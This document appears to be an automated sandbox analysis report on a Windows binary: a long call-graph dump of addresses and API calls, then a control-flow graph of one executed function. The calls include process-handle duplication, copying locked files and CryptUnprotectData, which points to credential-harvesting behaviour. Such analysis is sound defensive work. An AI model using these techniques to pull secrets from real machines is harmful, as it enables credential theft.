GetCurrentProcess DuplicateHandle 38864->38865 38869 40e152 38864->38869 38866 40e0d0 GetFileSize 38865->38866 38867 40e14a CloseHandle 38865->38867 38960 409a45 GetTempPathW 38866->38960 38867->38869 38868 40e160 38872 40b04b ??3@YAXPAX 38868->38872 38869->38868 38871 406214 22 API calls 38869->38871 38871->38868 38872->38860 38873 40e0ea 38963 4096dc CreateFileW 38873->38963 38875 40e0f1 CreateFileMappingW 38876 40e140 CloseHandle CloseHandle 38875->38876 38877 40e10b MapViewOfFile 38875->38877 38876->38867 38878 40e13b CloseHandle 38877->38878 38879 40e11f WriteFile UnmapViewOfFile 38877->38879 38878->38876 38879->38878 38881 40e18c 38880->38881 38964 406b90 38881->38964 38884 40e1a7 memset 38890 40e1e8 38884->38890 38885 40e299 38974 4069a3 38885->38974 38891 40e283 38890->38891 38892 40dd50 _wcsicmp 38890->38892 38898 40e244 _snwprintf 38890->38898 38981 406e8f 13 API calls 38890->38981 38982 40742e 8 API calls 38890->38982 38983 40aae3 wcslen wcslen _memicmp 38890->38983 38984 406b53 SetFilePointerEx ReadFile 38890->38984 38893 40e291 38891->38893 38894 40e288 free 38891->38894 38892->38890 38895 40aa04 free 38893->38895 38894->38893 38895->38885 38899 40a8d0 7 API calls 38898->38899 38899->38890 38901 40e2c2 38900->38901 38902 406b90 11 API calls 38901->38902 38917 40e2d3 38902->38917 38903 40e4a0 38904 4069a3 2 API calls 38903->38904 38905 40e4ab 38904->38905 38905->38853 38908 40e489 38909 40aa04 free 38908->38909 38911 40e491 38909->38911 38910 40dd50 _wcsicmp 38910->38917 38911->38903 38912 40e497 free 38911->38912 38912->38903 38914 40e376 memset 38987 40aa29 38914->38987 38917->38903 38917->38908 38917->38910 38918 40e3e0 memcpy 38917->38918 38919 40e3b3 wcschr 38917->38919 38920 40e3fb memcpy 38917->38920 38921 40e416 memcpy 38917->38921 38922 40e431 memcpy 38917->38922 38985 406e8f 13 API calls 38917->38985 38986 40dd50 _wcsicmp 38917->38986 38995 40742e 8 API calls 38917->38995 38996 406b53 SetFilePointerEx ReadFile 38917->38996 38918->38917 38919->38917 38920->38917 38921->38917 38922->38917 38923->38838 38925 406294 CloseHandle 38924->38925 38926 406224 38925->38926 38927 4096c3 CreateFileW 38926->38927 38928 40622d 38927->38928 38929 406281 GetLastError 38928->38929 38931 40a2ef ReadFile 38928->38931 38930 40625a 38929->38930 38930->38860 38935 40dd85 memset 38930->38935 38932 406244 38931->38932 38932->38929 38933 40624b 38932->38933 38933->38930 38934 406777 19 API calls 38933->38934 38934->38930 38936 409bca GetModuleFileNameW 38935->38936 38937 40ddbe CreateFileW 38936->38937 38940 40ddf1 38937->38940 38938 40afcf ??2@YAPAXI ??3@YAXPAX 38938->38940 38939 41352f 9 API calls 38939->38940 38940->38938 38940->38939 38941 40de0b NtQuerySystemInformation 38940->38941 38942 40de3b CloseHandle GetCurrentProcessId 38940->38942 38941->38940 38943 40de54 38942->38943 38944 413d4c 46 API calls 38943->38944 38948 40de88 38944->38948 38945 40e00c 38946 413d29 free FreeLibrary 38945->38946 38947 40e014 38946->38947 38947->38860 38947->38863 38948->38945 38949 40dea9 _wcsicmp 38948->38949 38953 40dfef CloseHandle 38948->38953 38954 40df78 38948->38954 38955 40df23 GetCurrentProcess DuplicateHandle 38948->38955 38958 40df8f CloseHandle 38948->38958 38950 40dee7 OpenProcess 38949->38950 38951 40debd _wcsicmp 38949->38951 38950->38948 38951->38950 38952 40ded0 _wcsicmp 38951->38952 38952->38948 38952->38950 38953->38948 38954->38953 38954->38958 38959 40dfae _wcsicmp 38954->38959 38955->38948 38956 40df4c memset 38955->38956 38957 41352f 9 API calls 38956->38957 38957->38948 38958->38954 38959->38948 38959->38954 38961 409a74 GetTempFileNameW 38960->38961 38962 409a66 GetWindowsDirectoryW 38960->38962 38961->38873 38962->38961 38963->38875 38967 406bd5 38964->38967 38968 406bad 38964->38968 38965 406bba _wcsicmp 38965->38967 38965->38968 38966 4066bf free malloc memcpy free free 38969 406be5 38966->38969 38967->38966 38973 406c0f 38967->38973 38968->38965 38968->38967 38970 40afcf ??2@YAPAXI ??3@YAXPAX 38969->38970 38969->38973 38971 406bff 38970->38971 38972 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 38971->38972 38972->38973 38973->38884 38973->38885 38975 4069c4 ??3@YAXPAX 38974->38975 38976 4069af 38975->38976 38977 40b633 free 38976->38977 38978 4069ba 38977->38978 38979 40b04b ??3@YAXPAX 38978->38979 38980 4069c2 38979->38980 38980->38853 38981->38890 38982->38890 38983->38890 38984->38890 38985->38917 38986->38914 38988 40aa33 38987->38988 38989 40aa63 38987->38989 38990 40aa44 38988->38990 38991 40aa38 wcslen 38988->38991 38989->38917 38992 40a9ce malloc memcpy free free 38990->38992 38991->38990 38993 40aa4d 38992->38993 38993->38989 38994 40aa51 memcpy 38993->38994 38994->38989 38995->38917 38996->38917 38999 40a980 38997->38999 38998 40a8bb 38998->38763 38998->38764 38999->38998 39000 40a995 _wcsicmp 38999->39000 39001 40a99c wcscmp 38999->39001 39000->38999 39001->38999 39002->38767 39003->38771 39005 40aa23 RegEnumValueW 39004->39005 39005->38778 39005->38779 39007 405335 39006->39007 39008 40522a 39006->39008 39007->38363 39009 40b2cc 27 API calls 39008->39009 39010 405234 39009->39010 39011 40a804 8 API calls 39010->39011 39012 40523a 39011->39012 39051 40b273 39012->39051 39014 405248 _mbscpy _mbscat GetProcAddress 39015 40b273 27 API calls 39014->39015 39016 405279 39015->39016 39054 405211 GetProcAddress 39016->39054 39018 405282 39019 40b273 27 API calls 39018->39019 39020 40528f 39019->39020 39055 405211 GetProcAddress 39020->39055 39022 405298 39023 40b273 27 API calls 39022->39023 39024 4052a5 39023->39024 39056 405211 GetProcAddress 39024->39056 39026 4052ae 39027 40b273 27 API calls 39026->39027 39028 4052bb 39027->39028 39057 405211 GetProcAddress 39028->39057 39030 4052c4 39031 40b273 27 API calls 39030->39031 39032 4052d1 39031->39032 39058 405211 GetProcAddress 39032->39058 39034 4052da 39035 40b273 27 API calls 39034->39035 39036 4052e7 39035->39036 39059 405211 GetProcAddress 39036->39059 39038 4052f0 39052 40b58d 27 API calls 39051->39052 39053 40b18c 39052->39053 39053->39014 39054->39018 39055->39022 39056->39026 39057->39030 39058->39034 39059->39038 39064 405220 39 API calls 39063->39064 39065 405369 39064->39065 39065->38796 39065->38797 39066->38800 39067->38803 39068->38799 39069->38797 39071 40440c FreeLibrary 39070->39071 39072 40436d 39071->39072 39073 40a804 8 API calls 39072->39073 39074 404377 39073->39074 39075 404383 39074->39075 39076 404405 39074->39076 39077 40b273 27 API calls 39075->39077 39076->38367 39076->38370 39076->38371 39078 40438d GetProcAddress 39077->39078 39079 40b273 27 API calls 39078->39079 39080 4043a7 GetProcAddress 39079->39080 39081 40b273 27 API calls 39080->39081 39082 4043ba GetProcAddress 39081->39082 39083 40b273 27 API calls 39082->39083 39084 4043ce GetProcAddress 39083->39084 39085 40b273 27 API calls 39084->39085 39086 4043e2 GetProcAddress 39085->39086 39087 4043f1 39086->39087 39088 4043f7 39087->39088 39089 40440c FreeLibrary 39087->39089 39088->39076 39089->39076 39091 404413 FreeLibrary 39090->39091 39092 40441e 39090->39092 39091->39092 39092->38385 39093->38382 39095 40447e 39094->39095 39096 40442e 39094->39096 39097 404485 CryptUnprotectData 39095->39097 39098 40449c 39095->39098 39099 40b2cc 27 API calls 39096->39099 39097->39098 39098->38382 39100 404438 39099->39100 39101 40a804 8 API calls 39100->39101 39102 40443e 39101->39102 39103 404445 39102->39103 39104 404467 39102->39104 39105 40b273 27 API calls 39103->39105 39104->39095 39106 404475 FreeLibrary 39104->39106 39107 40444f GetProcAddress 39105->39107 39106->39095 39107->39104 39108 404460 39107->39108 39108->39104 39110 4135f6 39109->39110 39111 4135eb FreeLibrary 39109->39111 39110->38388 39111->39110 39113 4449c4 39112->39113 39114 444a52 39112->39114 39115 40b2cc 27 API calls 39113->39115 39114->38405 39114->38406 39116 4449cb 39115->39116 39117 40a804 8 API calls 39116->39117 39118 4449d1 39117->39118 39133->38416 39134->38416 39135->38416 39136->38416 39139 403a29 39138->39139 39153 403bed memset memset 39139->39153 39141 403a2f 39142 403ae7 39141->39142 39143 403a3f memset 39141->39143 39146 409d1f 6 API calls 39141->39146 39147 409b98 GetFileAttributesW 39141->39147 39148 40a8d0 7 API calls 39141->39148 39166 40b1ab free free 39142->39166 39143->39141 39145 403aef 39145->38425 39146->39141 39147->39141 39148->39141 39150 40a051 GetFileTime CloseHandle 39149->39150 39151 4039ca CompareFileTime 39149->39151 39150->39151 39151->38425 39152->38422 39154 414c2e 17 API calls 39153->39154 39155 403c38 39154->39155 39156 409719 2 API calls 39155->39156 39157 403c3f wcscat 39156->39157 39158 414c2e 17 API calls 39157->39158 39159 403c61 39158->39159 39160 409719 2 API calls 39159->39160 39161 403c68 wcscat 39160->39161 39167 403af5 39161->39167 39164 403af5 20 API calls 39165 403c95 39164->39165 39165->39141 39166->39145 39168 403b02 39167->39168 39169 40ae18 9 API calls 39168->39169 39174 403b37 39169->39174 39170 40ae51 9 API calls 39170->39174 39171 403bdb 39172 40aebe FindClose 39171->39172 39173 403be6 39172->39173 39173->39164 39174->39170 39174->39171 39175 40ae18 9 API calls 39174->39175 39176 40add4 wcscmp wcscmp 39174->39176 39177 40aebe FindClose 39174->39177 39178 40a8d0 7 API calls 39174->39178 39175->39174 39176->39174 39177->39174 39178->39174 39180 409d1f 6 API calls 39179->39180 39181 404190 39180->39181 39194 409b98 GetFileAttributesW 39181->39194 39183 40419c 39184 4041a7 6 API calls 39183->39184 39185 40435c 39183->39185 39187 40424f 39184->39187 39185->38450 39187->39185 39188 40425e memset 39187->39188 39190 409d1f 6 API calls 39187->39190 39191 40a8ab 9 API calls 39187->39191 39195 414842 39187->39195 39188->39187 39189 404296 wcscpy 39188->39189 39189->39187 39190->39187 39192 4042b6 memset memset _snwprintf wcscpy 39191->39192 39192->39187 39193->38448 39194->39183 39198 41443e 39195->39198 39197 414866 39197->39187 39199 41444b 39198->39199 39200 414451 39199->39200 39201 4144a3 GetPrivateProfileStringW 39199->39201 39202 414491 39200->39202 39203 414455 wcschr 39200->39203 39201->39197 39204 414495 WritePrivateProfileStringW 39202->39204 39203->39202 39205 414463 _snwprintf 39203->39205 39204->39197 39205->39204 39206->38454 39208 40b2cc 27 API calls 39207->39208 39209 409615 39208->39209 39210 409d1f 6 API calls 39209->39210 39211 409625 39210->39211 39236 409b98 GetFileAttributesW 39211->39236 39213 409634 39214 409648 39213->39214 39237 4091b8 memset 39213->39237 39216 40b2cc 27 API calls 39214->39216 39218 408801 39214->39218 39217 40965d 39216->39217 39219 409d1f 6 API calls 39217->39219 39218->38457 39218->38458 39220 40966d 39219->39220 39289 409b98 GetFileAttributesW 39220->39289 39222 40967c 39222->39218 39223 409681 39222->39223 39290 409529 72 API calls 39223->39290 39225 409690 39225->39218 39236->39213 39291 40a6e6 WideCharToMultiByte 39237->39291 39239 409202 39292 444432 39239->39292 39242 40b273 27 API calls 39243 409236 39242->39243 39338 438552 39243->39338 39269 40951d 39269->39214 39289->39222 39290->39225 39291->39239 39388 4438b5 39292->39388 39294 44444c 39295 409215 39294->39295 39402 415a6d 39294->39402 39295->39242 39295->39269 39297 4442e6 11 API calls 39298 444486 39300 4444b9 memcpy 39298->39300 39337 4444a4 39298->39337 39406 415258 39300->39406 39337->39297 39520 438460 39338->39520 39389 4438d0 39388->39389 39399 4438c9 39388->39399 39476 415378 memcpy memcpy 39389->39476 39399->39294 39403 415a77 39402->39403 39404 415a8d 39403->39404 39405 415a7e memset 39403->39405 39404->39298 39405->39404 39532 41703f 39520->39532 39659 413f4f 39632->39659 39635 413f37 K32GetModuleFileNameExW 39636 413f4a 39635->39636 39636->38517 39638 413969 wcscpy 39637->39638 39639 41396c wcschr 39637->39639 39649 413a3a 39638->39649 39639->39638 39641 41398e 39639->39641 39664 4097f7 wcslen wcslen _memicmp 39641->39664 39643 41399a 39644 4139a4 memset 39643->39644 39645 4139e6 39643->39645 39665 409dd5 GetWindowsDirectoryW wcscpy 39644->39665 39647 413a31 wcscpy 39645->39647 39648 4139ec memset 39645->39648 39647->39649 39666 409dd5 GetWindowsDirectoryW wcscpy 39648->39666 39649->38517 39650 4139c9 wcscpy wcscat 39650->39649 39652 413a11 memcpy wcscat 39652->39649 39654 413cb0 GetModuleHandleW 39653->39654 39655 413cda 39653->39655 39654->39655 39658 413cbf GetProcAddress 39654->39658 39656 413ce3 GetProcessTimes 39655->39656 39657 413cf6 39655->39657 39656->38519 39657->38519 39658->39655 39660 413f2f 39659->39660 39661 413f54 39659->39661 39660->39635 39660->39636 39662 40a804 8 API calls 39661->39662 39663 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39662->39663 39663->39660 39664->39643 39665->39650 39666->39652 39667->38539 39668->38562 39670 409cf9 GetVersionExW 39669->39670 39671 409d0a 39669->39671 39670->39671 39671->38569 39671->38574 39672->38575 39673->38579 39674->38581 39675->38647 39677 40bba5 39676->39677 39721 40cc26 39677->39721 39680 40bd4b 39742 40cc0c 39680->39742 39685 40b2cc 27 API calls 39686 40bbef 39685->39686 39749 40ccf0 _wcsicmp 39686->39749 39688 40bbf5 39688->39680 39750 40ccb4 6 API calls 39688->39750 39690 40bc26 39691 40cf04 17 API calls 39690->39691 39692 40bc2e 39691->39692 39693 40bd43 39692->39693 39694 40b2cc 27 API calls 39692->39694 39695 40cc0c 4 API calls 39693->39695 39696 40bc40 39694->39696 39695->39680 39751 40ccf0 _wcsicmp 39696->39751 39698 40bc46 39698->39693 39699 40bc61 memset memset WideCharToMultiByte 39698->39699 39752 40103c strlen 39699->39752 39701 40bcc0 39702 40b273 27 API calls 39701->39702 39703 40bcd0 memcmp 39702->39703 39703->39693 39704 40bce2 39703->39704 39705 404423 38 API calls 39704->39705 39706 40bd10 39705->39706 39706->39693 39707 40bd3a LocalFree 39706->39707 39708 40bd1f memcpy 39706->39708 39707->39693 39708->39707 39709->38662 39710->38698 39711->38698 39712->38698 39713->38698 39714->38698 39715->38698 39716->38698 39717->38698 39718->38698 39719->38674 39720->38695 39753 4096c3 CreateFileW 39721->39753 39723 40cc34 39724 40cc3d GetFileSize 39723->39724 39726 40bbca 39723->39726 39725 40afcf 2 API calls 39724->39725 39727 40cc64 39725->39727 39726->39680 39733 40cf04 39726->39733 39754 40a2ef ReadFile 39727->39754 39729 40cc71 39755 40ab4a MultiByteToWideChar 39729->39755 39731 40cc95 CloseHandle 39732 40b04b ??3@YAXPAX 39731->39732 39732->39726 39734 40b633 free 39733->39734 39735 40cf14 39734->39735 39761 40b1ab free free 39735->39761 39737 40bbdd 39737->39680 39737->39685 39738 40cf1b 39738->39737 39739 40cfef 39738->39739 39762 40cd4b 39738->39762 39741 40cd4b 14 API calls 39739->39741 39741->39737 39743 40b633 free 39742->39743 39744 40cc15 39743->39744 39745 40aa04 free 39744->39745 39746 40cc1d 39745->39746 39803 40b1ab free free 39746->39803 39748 40b7d4 memset CreateFileW 39748->38653 39748->38654 39749->39688 39750->39690 39751->39698 39752->39701 39753->39723 39754->39729 39756 40ab6b 39755->39756 39760 40ab93 39755->39760 39757 40a9ce 4 API calls 39756->39757 39758 40ab74 39757->39758 39759 40ab7c MultiByteToWideChar 39758->39759 39759->39760 39760->39731 39761->39738 39763 40cd7b 39762->39763 39764 40aa29 6 API calls 39763->39764 39768 40cd89 39764->39768 39765 40cef5 39766 40aa04 free 39765->39766 39767 40cefd 39766->39767 39767->39738 39768->39765 39769 40aa29 6 API calls 39768->39769 39770 40ce1d 39769->39770 39771 40aa29 6 API calls 39770->39771 39772 40ce3e 39771->39772 39773 40ce6a 39772->39773 39796 40abb7 wcslen memmove 39772->39796 39774 40ce9f 39773->39774 39799 40abb7 wcslen memmove 39773->39799 39777 40a8d0 7 API calls 39774->39777 39780 40ceb5 39777->39780 39778 40ce56 39797 40aa71 wcslen 39778->39797 39779 40ce8b 39800 40aa71 wcslen 39779->39800 39785 40a8d0 7 API calls 39780->39785 39783 40ce5e 39798 40abb7 wcslen memmove 39783->39798 39787 40cecb 39785->39787 39786 40ce93 39801 40abb7 wcslen memmove 39786->39801 39802 40d00b malloc memcpy free free 39787->39802 39790 40cedd 39791 40aa04 free 39790->39791 39792 40cee5 39791->39792 39793 40aa04 free 39792->39793 39794 40ceed 39793->39794 39795 40aa04 free 39794->39795 39795->39765 39796->39778 39797->39783 39798->39773 39799->39779 39800->39786 39801->39774 39802->39790 39803->39748 39804->38714 39805->38722 40485 441819 40488 430737 40485->40488 40487 441825 40489 430756 40488->40489 40501 43076d 40488->40501 40490 430774 40489->40490 40491 43075f 40489->40491 40503 43034a memcpy 40490->40503 40502 4169a7 11 API calls 40491->40502 40494 4307ce 40496 430819 memset 40494->40496 40504 415b2c 11 API calls 40494->40504 40495 43077e 40495->40494 40499 4307fa 40495->40499 40495->40501 40496->40501 40498 4307e9 40498->40496 40498->40501 40505 4169a7 11 API calls 40499->40505 40501->40487 40502->40501 40503->40495 40504->40498 40505->40501 40506 41493c EnumResourceNamesW 39806 4415ea 39814 4304b2 39806->39814 39808 4415fe 39809 4418e2 39808->39809 39811 4418ea 39808->39811 39813 442bd4 39808->39813 39809->39811 39861 4414a9 12 API calls 39809->39861 39813->39811 39862 441409 memset 39813->39862 39863 43041c 12 API calls 39814->39863 39816 4304cd 39821 430557 39816->39821 39864 43034a memcpy 39816->39864 39818 4304f3 39818->39821 39865 430468 11 API calls 39818->39865 39820 430506 39820->39821 39822 43057b 39820->39822 39866 43817e 39820->39866 39821->39808 39823 415a91 memset 39822->39823 39825 430584 39823->39825 39825->39821 39871 4397fd memset 39825->39871 39827 4305e4 39827->39821 39872 4328e4 12 API calls 39827->39872 39829 43052d 39829->39821 39829->39822 39832 430542 39829->39832 39831 4305fa 39833 430609 39831->39833 39873 423383 11 API calls 39831->39873 39832->39821 39870 4169a7 11 API calls 39832->39870 39874 423330 11 API calls 39833->39874 39836 430634 39875 423399 11 API calls 39836->39875 39838 430648 39876 4233ae 11 API calls 39838->39876 39840 43066b 39877 423330 11 API calls 39840->39877 39842 43067d 39878 4233ae 11 API calls 39842->39878 39844 430695 39879 423330 11 API calls 39844->39879 39846 4306d6 39881 423330 11 API calls 39846->39881 39847 4306a7 39847->39846 39849 4306c0 39847->39849 39880 4233ae 11 API calls 39849->39880 39850 4306d1 39882 430369 17 API calls 39850->39882 39853 4306f3 39883 423330 11 API calls 39853->39883 39855 430704 39884 423330 11 API calls 39855->39884 39857 430710 39885 423330 11 API calls 39857->39885 39859 43071e 39886 423383 11 API calls 39859->39886 39861->39811 39862->39813 39863->39816 39864->39818 39865->39820 39867 438187 39866->39867 39869 438192 39866->39869 39887 4380f6 39867->39887 39869->39829 39870->39821 39871->39827 39872->39831 39873->39833 39874->39836 39875->39838 39876->39840 39877->39842 39878->39844 39879->39847 39880->39850 39881->39850 39882->39853 39883->39855 39884->39857 39885->39859 39886->39821 39889 43811f 39887->39889 39888 438164 39888->39869 39889->39888 39892 437e5e 39889->39892 39915 4300e8 memset memset memcpy 39889->39915 39916 437d3c 39892->39916 39894 437eb3 39894->39889 39895 437ea9 39895->39894 39901 437f22 39895->39901 39931 41f432 39895->39931 39898 437f06 39982 415c56 11 API calls 39898->39982 39900 437f95 39983 415c56 11 API calls 39900->39983 39902 437f7f 39901->39902 39903 432d4e 3 API calls 39901->39903 39902->39900 39904 43802b 39902->39904 39903->39902 39942 4165ff 39904->39942 39910 43806b 39911 438094 39910->39911 39984 42f50e 145 API calls 39910->39984 39912 437fa3 39911->39912 39985 4300e8 memset memset memcpy 39911->39985 39912->39894 39986 41f638 104 API calls 39912->39986 39915->39889 39917 437d69 39916->39917 39920 437d80 39916->39920 39987 437ccb 11 API calls 39917->39987 39919 437d76 39919->39895 39920->39919 39921 437da3 39920->39921 39922 437d90 39920->39922 39924 438460 140 API calls 39921->39924 39922->39919 39991 437ccb 11 API calls 39922->39991 39926 437dcb 39924->39926 39930 437de8 39926->39930 39988 444283 13 API calls 39926->39988 39928 437dfc 39989 437ccb 11 API calls 39928->39989 39990 424f26 123 API calls 39930->39990 39932 41f54d 39931->39932 39935 41f44f 39931->39935 39933 41f466 39932->39933 40021 41c635 memset memset 39932->40021 39933->39898 39933->39901 39935->39933 39940 41f50b 39935->39940 39992 41f1a5 39935->39992 40017 41c06f memcmp 39935->40017 40018 41f3b1 90 API calls 39935->40018 40019 41f398 86 API calls 39935->40019 39940->39932 39940->39933 40020 41c295 86 API calls 39940->40020 39943 4165a0 11 API calls 39942->39943 39944 41660d 39943->39944 39945 437371 39944->39945 39946 41703f 11 API calls 39945->39946 39947 437399 39946->39947 39948 43739d 39947->39948 39949 4373ac 39947->39949 40126 4446ea 11 API calls 39948->40126 39951 416935 16 API calls 39949->39951 39974 4373ca 39951->39974 39952 437584 39954 4375bc 39952->39954 40133 42453e 123 API calls 39952->40133 39953 438460 140 API calls 39953->39974 39956 415c7d 16 API calls 39954->39956 39957 4375d2 39956->39957 39959 4442e6 11 API calls 39957->39959 39961 4373a7 39957->39961 39958 4251c4 143 API calls 39958->39974 39960 4375e2 39959->39960 39960->39961 40134 444283 13 API calls 39960->40134 39961->39910 39963 415a91 memset 39963->39974 39966 43758f 40132 42453e 123 API calls 39966->40132 39969 4375f4 39972 437620 39969->39972 39973 43760b 39969->39973 39971 43759f 39975 416935 16 API calls 39971->39975 39977 416935 16 API calls 39972->39977 40135 444283 13 API calls 39973->40135 39974->39952 39974->39953 39974->39958 39974->39963 39974->39966 39981 437d3c 141 API calls 39974->39981 40125 415308 free 39974->40125 40127 425433 13 API calls 39974->40127 40128 425413 17 API calls 39974->40128 40129 42533e 16 API calls 39974->40129 40130 42538f 16 API calls 39974->40130 40131 42453e 123 API calls 39974->40131 39975->39952 39977->39961 39979 437612 memcpy 39979->39961 39981->39974 39982->39894 39983->39912 39984->39911 39985->39912 39986->39894 39987->39919 39988->39928 39989->39930 39990->39919 39991->39919 40022 41bc3b 39992->40022 39995 41edad 86 API calls 39996 41f1cb 39995->39996 39997 41f1f5 memcmp 39996->39997 39998 41f20e 39996->39998 40002 41f282 39996->40002 39997->39998 39999 41f21b memcmp 39998->39999 39998->40002 40000 41f326 39999->40000 40003 41f23d 39999->40003 40001 41ee6b 86 API calls 40000->40001 40000->40002 40001->40002 40002->39935 40003->40000 40004 41f28e memcmp 40003->40004 40046 41c8df 56 API calls 40003->40046 40004->40000 40005 41f2a9 40004->40005 40005->40000 40008 41f308 40005->40008 40009 41f2d8 40005->40009 40007 41f269 40007->40000 40010 41f287 40007->40010 40011 41f27a 40007->40011 40008->40000 40048 4446ce 11 API calls 40008->40048 40012 41ee6b 86 API calls 40009->40012 40010->40004 40013 41ee6b 86 API calls 40011->40013 40014 41f2e0 40012->40014 40013->40002 40047 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40014->40047 40017->39935 40018->39935 40019->39935 40020->39932 40021->39933 40023 41be0b 40022->40023 40025 41bc54 40022->40025 40026 41bd61 40023->40026 40062 41ae17 34 API calls 40023->40062 40025->40023 40025->40026 40037 41bc8d 40025->40037 40049 41baf0 40025->40049 40028 41be45 40026->40028 40063 41a25f memset 40026->40063 40028->39995 40028->40002 40030 41be04 40061 41aee4 56 API calls 40030->40061 40032 41bd42 40032->40026 40032->40030 40033 41bdd8 memset 40032->40033 40034 41bdba 40032->40034 40035 41bde7 memcmp 40033->40035 40045 4175ed 6 API calls 40034->40045 40035->40030 40038 41bdfd 40035->40038 40036 41bd18 40036->40026 40036->40032 40059 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40036->40059 40037->40026 40037->40032 40037->40036 40055 4151e3 40037->40055 40060 41a1b0 memset 40038->40060 40041 41bdcc 40041->40026 40041->40035 40045->40041 40046->40007 40047->40002 40048->40000 40050 41bb1c 40049->40050 40051 41bb2c 40049->40051 40064 4185ca 40050->40064 40052 41bb83 40051->40052 40053 4151e3 55 API calls 40051->40053 40052->40037 40053->40052 40088 41837f 40055->40088 40058 444706 11 API calls 40058->40036 40059->40032 40060->40030 40061->40023 40062->40026 40063->40028 40076 418160 40064->40076 40066 4185dc 40075 4185e3 40066->40075 40085 41739b 40066->40085 40069 4185f5 memset GetFileAttributesExW 40071 418628 GetLastError 40069->40071 40073 418614 40069->40073 40070 418646 GetFileAttributesA 40072 41864f free 40070->40072 40071->40073 40074 418633 free 40071->40074 40072->40075 40073->40072 40074->40075 40075->40051 40077 41739b GetVersionExW 40076->40077 40078 418165 40077->40078 40080 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 40078->40080 40081 418178 40080->40081 40082 41817f 40081->40082 40083 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 40081->40083 40082->40066 40084 418188 free 40083->40084 40084->40066 40086 4173d6 40085->40086 40087 4173ad GetVersionExW 40085->40087 40086->40069 40086->40070 40087->40086 40089 4183c1 40088->40089 40090 4183ca 40088->40090 40123 418197 25 API calls 40089->40123 40092 418160 11 API calls 40090->40092 40093 4151f9 40090->40093 40094 4183e5 40092->40094 40093->40036 40093->40058 40094->40093 40095 41739b GetVersionExW 40094->40095 40096 418440 40095->40096 40097 418444 CreateFileW 40096->40097 40098 41845f CreateFileA 40096->40098 40099 418477 40097->40099 40098->40099 40100 4184c2 memset 40099->40100 40101 41847e GetLastError free 40099->40101 40109 418758 40100->40109 40102 4184b5 40101->40102 40103 418497 40101->40103 40124 444706 11 API calls 40102->40124 40105 41837f 49 API calls 40103->40105 40105->40093 40110 418680 43 API calls 40109->40110 40111 418782 40110->40111 40112 418160 11 API calls 40111->40112 40114 418506 free 40111->40114 40113 418799 40112->40113 40113->40114 40115 41739b GetVersionExW 40113->40115 40114->40093 40116 4187a7 40115->40116 40117 4187da 40116->40117 40118 4187ad GetDiskFreeSpaceW 40116->40118 40119 4187ec GetDiskFreeSpaceA 40117->40119 40122 4187e8 40117->40122 40121 418800 free 40118->40121 40119->40121 40121->40114 40122->40119 40123->40090 40124->40093 40125->39974 40126->39961 40127->39974 40128->39974 40129->39974 40130->39974 40131->39974 40132->39971 40133->39954 40134->39969 40135->39979

                                                                                                                          Executed Functions

                                                                                                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
